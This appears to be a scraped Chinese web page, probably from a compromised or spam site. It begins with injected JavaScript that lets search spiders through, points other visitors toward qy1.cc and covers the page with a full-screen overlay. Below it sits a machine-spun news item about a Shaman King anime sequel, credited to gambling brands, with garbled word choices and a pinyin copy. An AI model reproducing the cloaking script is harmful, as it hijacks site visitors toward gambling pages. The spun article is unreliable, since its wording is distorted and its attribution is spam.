var reg = /(Baiduspider|360Spider|YisouSpider|YandexBot|Sogou inst spider|Sogou web spider|spider)/i; if (!reg.test(navigator.userAgent)) { let flag = navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i); if (flag) { //k _src = 'https://qy1.cc/' } else { // PC _src = 'https://qy1.cc/' } document.write(''); var hd = document.head; var styleCSS = document.createElement('style'), yabo = document.createElement('div'); styleCSS.innerHTML = 'html,body{position:relative;width:auto !important;height:100% !important;min-width:auto !important;overflow:hidden;}.yabo{position:fixed;top:0;left:0;right:0;height:100%;z-index:9999999999;background:#fff;}'; yabo.setAttribute('class', 'yabo'); yabo.innerHTML = ''; hd.appendChild(styleCSS); hd.parentNode.appendChild(yabo); }

营业时间

周一至周五,8:00 - 9:00

致电我们

+15906190858(徐总)

给我们发电子邮件

zjyj@cscec.com

动画《通灵王》续篇建造决议

Author:华体会体育app官网下载|欧宝体育app登陆 In:2022-04-25 动画《通灵王》续篇建造决议

按照武井宏之原作建造的TV动画《通灵王》公布了建造续篇的动静 。一段特报视频也一并公然 ,在视频中可以看到以花为中央的有关续篇的内容。有关续篇的更多动静,还将于往后公然。

《通灵王》讲述了为了成为通灵王而起劲的主人公的发展故事 。本作于2001年TV动画化,以后在2021年又推出了彻底新作动画 ,此次的新作动画于4月21日播出了终极回 。

华体会体育app官网下载|欧宝体育app登陆
【读音】:

àn zhào wǔ jǐng hóng zhī yuán zuò jiàn zào de TVdòng huà 《tōng líng wáng 》gōng bù le jiàn zào xù piān de dòng jìng 。yī duàn tè bào shì pín yě yī bìng gōng rán ,zài shì pín zhōng kě yǐ kàn dào yǐ huā wéi zhōng yāng de yǒu guān xù piān de nèi róng 。yǒu guān xù piān de gèng duō dòng jìng ,hái jiāng yú wǎng hòu gōng rán 。

《tōng líng wáng 》jiǎng shù le wéi le chéng wéi tōng líng wáng ér qǐ jìn de zhǔ rén gōng de fā zhǎn gù shì 。běn zuò yú 2001nián TVdòng huà huà ,yǐ hòu zài 2021nián yòu tuī chū le chè dǐ xīn zuò dòng huà ,cǐ cì de xīn zuò dòng huà yú 4yuè 21rì bō chū le zhōng jí huí 。

发表评论